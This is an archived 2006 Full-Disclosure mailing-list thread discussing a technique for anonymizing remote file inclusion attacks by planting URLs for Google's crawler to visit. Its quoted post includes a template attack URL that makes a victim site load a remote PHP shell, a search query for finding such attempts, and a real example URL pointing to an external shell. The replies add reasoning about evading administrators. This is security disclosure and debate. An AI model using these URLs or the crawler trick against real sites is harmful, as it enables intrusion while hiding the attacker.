lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 25 Nov 2006 01:01:54 -0500 From: "Dude VanWinkle" <dudevanwinkle@...il.com> To: endrazine <endrazine@...il.com> Cc: full-disclosure@...ts.grok.org.uk, Gadi Evron <ge@...uxbox.org> Subject: Re: Anonymizing RFI Attacks Through Google On 11/25/06, endrazine <endrazine@...il.com> wrote: > Hi Gadi, > > I beg your pardon, but either I missed the purpose of this post, or you > discovered hot water : > this process of attack is a mere waste of time if one only reaches > anonymity : in order to > give google this new url to crawl, you'd have to either create a web > page that points to this > very page, or enter the url in the google database directly using their > form. None of those two > options are safer than attacking the website directly (google might vey > well log your actions), > so what's the point ? > a lot of people are used to seeing google spider tracks in their logs. anonymizing your attack via google may make the admin investigating the attack think that a malfunctioning web bot was responsible for the attack, or they may skim over the entire incident accidentally. JMO -JP<who thinks unabashed douchebaggery is a sign of character, not weakness thereof> > Also, most features in the web (like free emails, online scanning, > pinging, lookup, etc., most > applets allowing you to use irc, ftp or other services...) can be used > to Anonymise (or at least "proxify") > attacks. So why focusing on google and search engines specifically ? > > To be honest, my biggest issue with this post is its lack of > technicallity : no offense, but I can hardly see > anything that isn't public knowlege in this post. > > Regards, > > > endrazine- > > Gadi Evron a écrit : > > Noam Rathaus on using Google to anonymize attacks on websites: > > http://blogs.securiteam.com/index.php/archives/746 > > > > Anonymizing RFI Attacks Through Google > > noam - November 23, 2006 on 12:03 pm > > > > Google can be utilized to hack into websites - actively exploiting them > > (not information gathering by the use of "Google hacking", although that > > is how most of the sites vulnerable to RFI attacks are found). > > > > By placing a URL on any web page, Google will find it, visit it and then > > index it. With this mechanism, it is possible to anonymize attacks on > > third party web sites through Google by the use of its crawler. > > > > PoC - > > A malicious web page is constructed by an attacker, containing a URL built > > like so: > > 1. Third party site URI to attack. > > 2. File inclusion exploit. > > 3. Second URI containing a malicious PHP shell. > > > > Example URL: > > http://victim-site/RFI-exploit?http://URI-with-malicious-code.php > > > > Google will harvest this URL, visit the site using its crawler and index > > it. > > Meaning accessing the target site with the URL it was provided and > > exploiting it unwittingly for whoever planted it. It's a feature, not a > > bug. > > > > This is currently exploited in the wild. For example, try searching Google > > for: > > inurl:cmd.gif > > > > And note, as an example: > > www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd > > Which is no longer vulnerable. > > > > Why use a botnet when one can abuse the Google crawler, which is allowed > > on most web sites? > > > > Notes: > > 1. This attack was verified on Google, but there is no reason why it > > should not work with other search engines, web crawlers and web spiders. > > 2. File inclusions seem to tie in well with this attack anonymizer, but > > there is no reason why others attack types can?t be used in a similar > > fashion. > > 3. The feature might also be used to anonymize communication, as a covert > > channel. > > > > Noam Rathaus. > > (with thanks to Gadi Evron and Lev Toger) > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists